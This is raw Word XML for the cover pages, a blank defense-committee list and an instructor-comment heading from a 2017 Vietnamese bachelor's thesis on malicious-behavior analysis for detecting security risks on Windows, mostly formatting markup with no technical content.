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3998759"/>
    <w:p w:rsidR="001417F4" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00ED091A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-155575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-170180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5895975" cy="8553450"/>
                <wp:effectExtent l="19050" t="19050" r="47625" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5895975" cy="8553450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="47625"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EDA2BB" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-12.25pt;margin-top:-13.4pt;width:464.25pt;height:67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" filled="f" strokecolor="black [3213]" strokeweight="3.75pt">
                <v:stroke linestyle="thickThin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00526388" w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VIETNAM NATIONAL UNIVERSITY - HO CHI MINH CITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNIVERSITY OF INFORMATION TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FACULTY OF COMPUTER NETWORK AND COMMUNICATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LÊ THANH BÌNH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHÂU THIỆN HƯNG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>THESIS REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>STUDY</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> MALICIOUS BEHAVIOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ANALYSIS METHODS TO DETECT SECURITY RISKS ON </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WINDOWS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BACHELOR OF ENGINEERING INFORMATION SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00062D79" w:rsidRPr="00811A53" w:rsidRDefault="00062D79" w:rsidP="00062D79">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Instructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00062D79" w:rsidRPr="00811A53" w:rsidRDefault="00062D79" w:rsidP="00062D79">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PhD. NGUYỄN ANH TUẤN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HỒ CHÍ MINH CITY, 2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00ED091A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="470FE074" wp14:editId="47229E01">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-155575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-170180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5895975" cy="8553450"/>
                <wp:effectExtent l="19050" t="19050" r="47625" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Rectangle 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5895975" cy="8553450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="47625"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D60851" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:-12.25pt;margin-top:-13.4pt;width:464.25pt;height:673.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" filled="f" strokecolor="black [3213]" strokeweight="3.75pt">
                <v:stroke linestyle="thickThin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VIETNAM NATIONAL UNIVERSITY - HO CHI MINH CITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNIVERSITY OF INFORMATION TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FACULTY OF COMPUTER NETWORK AND COMMUNICATION</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r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LÊ THANH BÌNH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHÂU THIỆN HƯNG</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r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>THESIS REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>STUDY</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK3"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK4"/>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MALICIOUS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> BEHAVIOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ANALYSIS METHODS TO DETECT SECURITY RISKS ON </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WINDOWS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BACHELOR OF ENGINEERING INFORMATION SECURITY</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r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Instructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PhD. NGUYỄN ANH TUẤN</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ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HỒ CHÍ MINH CITY, 2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00811A53" w:rsidRDefault="001425DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00E445CE" w:rsidRDefault="001425DB" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc483575477"/>
      <w:bookmarkStart w:id="5" w:name="_Toc483676740"/>
      <w:bookmarkStart w:id="6" w:name="_Toc483834684"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DANH SÁCH HỘI ĐỒNG BẢO VỆ KHÓA LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00811A53" w:rsidRDefault="001425DB" w:rsidP="001425DB">
      <w:pPr>
        <w:spacing w:after="256"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00811A53" w:rsidRDefault="001425DB" w:rsidP="001425DB">
      <w:pPr>
        <w:spacing w:after="167"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:t xml:space="preserve">Hội đồng chấm khóa luận tốt nghiệp, thành lập theo Quyết định số </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRDefault="001425DB" w:rsidP="00AF4EA3">
      <w:pPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:t>…………………… ngày ………………</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00811A53">
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00811A53">
        <w:t xml:space="preserve"> của Hiệu trưởng Trường Đại học Công nghệ Thông tin. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="OLE_LINK1"/>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Chủ tịch</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Thư ký</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Ủy viên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Ủy viên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRPr="00811A53" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
        <w:ind w:left="345" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00811A53" w:rsidRDefault="00AF4EA3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00E445CE" w:rsidRDefault="00AF4EA3" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc483575478"/>
      <w:bookmarkStart w:id="9" w:name="_Toc483676741"/>
      <w:bookmarkStart w:id="10" w:name="_Toc483834685"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMMENT OF INSTRUCTOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00811A53" w:rsidRDefault="00AF4EA3" w:rsidP="00AF4EA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8789"/>
        </w:tabs>
        <w:spacing w:after="244" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pP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p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00E445CE" w:rsidRDefault="00AF4EA3" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
